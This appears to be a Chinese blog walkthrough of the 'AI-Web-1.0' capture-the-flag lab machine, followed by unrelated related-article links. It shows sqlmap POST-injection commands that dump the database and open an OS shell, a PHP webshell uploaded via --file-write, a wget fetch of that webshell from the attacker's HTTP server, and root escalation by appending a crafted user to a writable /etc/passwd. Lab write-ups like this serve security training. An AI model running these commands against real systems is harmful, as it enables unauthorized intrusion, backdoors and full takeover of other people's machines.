云尘靶场-AI-Web-1.0

2023-11-21 17:44
文章标签 ai web 靶场 1.0 云尘

本文主要是介绍云尘靶场-AI-Web-1.0,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

 还是先用fscan来扫c段

访问一下/robots.txt

访问一下看看 ,不能访问

删掉/upload

输个1 试试

 

1' 发现报错了

这里我们可以发现是post传参,那么sqlmap执行POST注入的方式

利用sqlmap进行POST注入_sqlmap post-CSDN博客

这里检查网络,看请求,可以看到传参

放到sqlmap

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid

说明存在sql注入

 >sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --dbs

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid -D aiweb1 --tables 

 sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid -D aiweb1 -T systemUser --dump --fresh-queries

这里没有flag,也不懂有什么用

访问另一个看看

 也是打不开,用dirsearch扫一下看看

 --os-shell

sqlmap --os-shell 原理详解_ZredamanJ的博客-CSDN博客

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --os-shell

 

--file-write

语法:

--file-write 木马文件 --file-dest 存放目录

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --file-write E:\123.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/123.php 

可以通过--os-shell 来检查一下是否上传成功

发现上传成功

那么我们可以通过蚁剑来连接了

 我以为这里就有flag了,但是并没有

python3 -m http.server 8888

打开终端我们可以发现我们的权限只是/www/data的权限

 

这里上传文件还看到别的方法,也来学习1下

wegt

本机开启web服务

python -m http.server 8888

因为我们的一句话木马在e盘下

所以我们在e盘下开启服务

open vpn里面有现在的ip

或者直接ipconfig

 

去kali的地址wget 123.php 

wget http://10.8.0.206:8888/123.php

 

成功了

提权

学习一下如何提权

回到蚁剑的终端

ls -l /etc/passwd

我们发现,当前用户对/etc/passwd有着读写权限r

通过 openssl passwd手动生成密码

openssl passwd 手动生成密码——passwd提权-CSDN博客

openssl passwd -1 -salt hack 123456

 root密码

root:x:0:0:root:/root:/bin/bashx为密码 就是上面生成的

 

hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash

那我们通过echo写入

echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /etc/passwd

不能直接sudo hack 会报错

我们使用py命令

python -c 'import pty;pty.spawn("/bin/bash")'

 但是报错了说,没有成功

没事学到东西就可以了

这篇关于云尘靶场-AI-Web-1.0的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/403982

相关文章

如何使用Maven创建web目录结构

《如何使用Maven创建web目录结构》:本文主要介绍如何使用Maven创建web目录结构的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录创建web工程第一步第二步第三步第四步第五步第六步第七步总结创建web工程第一步js通过Maven骨架创pytho

Java Web实现类似Excel表格锁定功能实战教程

《JavaWeb实现类似Excel表格锁定功能实战教程》本文将详细介绍通过创建特定div元素并利用CSS布局和JavaScript事件监听来实现类似Excel的锁定行和列效果的方法,感兴趣的朋友跟随... 目录1. 模拟Excel表格锁定功能2. 创建3个div元素实现表格锁定2.1 div元素布局设计2.

如何使用Haporxy搭建Web群集

《如何使用Haporxy搭建Web群集》Haproxy是目前比较流行的一种群集调度工具,同类群集调度工具有很多如LVS和Nginx,本案例介绍使用Haproxy及Nginx搭建一套Web群集,感兴趣的... 目录一、案例分析1.案例概述2.案例前置知识点2.1 HTTP请求2.2 负载均衡常用调度算法 2.

python web 开发之Flask中间件与请求处理钩子的最佳实践

《pythonweb开发之Flask中间件与请求处理钩子的最佳实践》Flask作为轻量级Web框架,提供了灵活的请求处理机制,中间件和请求钩子允许开发者在请求处理的不同阶段插入自定义逻辑,实现诸如... 目录Flask中间件与请求处理钩子完全指南1. 引言2. 请求处理生命周期概述3. 请求钩子详解3.1

SpringBoot项目Web拦截器使用的多种方式

《SpringBoot项目Web拦截器使用的多种方式》在SpringBoot应用中,Web拦截器(Interceptor)是一种用于在请求处理的不同阶段执行自定义逻辑的机制,下面给大家介绍Sprin... 目录一、实现 HandlerInterceptor 接口1、创建HandlerInterceptor实

Web技术与Nginx网站环境部署教程

《Web技术与Nginx网站环境部署教程》:本文主要介绍Web技术与Nginx网站环境部署教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、Web基础1.域名系统DNS2.Hosts文件3.DNS4.域名注册二.网页与html1.网页概述2.HTML概述3.

Spring AI 实现 STDIO和SSE MCP Server的过程详解

《SpringAI实现STDIO和SSEMCPServer的过程详解》STDIO方式是基于进程间通信,MCPClient和MCPServer运行在同一主机,主要用于本地集成、命令行工具等场景... 目录Spring AI 实现 STDIO和SSE MCP Server1.新建Spring Boot项目2.a

Python使用Reflex构建现代Web应用的完全指南

《Python使用Reflex构建现代Web应用的完全指南》这篇文章为大家深入介绍了Reflex框架的设计理念,技术特性,项目结构,核心API,实际开发流程以及与其他框架的对比和部署建议,感兴趣的小伙... 目录什么是 ReFlex?为什么选择 Reflex?安装与环境配置构建你的第一个应用核心概念解析组件

Nginx使用Keepalived部署web集群(高可用高性能负载均衡)实战案例

《Nginx使用Keepalived部署web集群(高可用高性能负载均衡)实战案例》本文介绍Nginx+Keepalived实现Web集群高可用负载均衡的部署与测试,涵盖架构设计、环境配置、健康检查、... 目录前言一、架构设计二、环境准备三、案例部署配置 前端 Keepalived配置 前端 Nginx

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤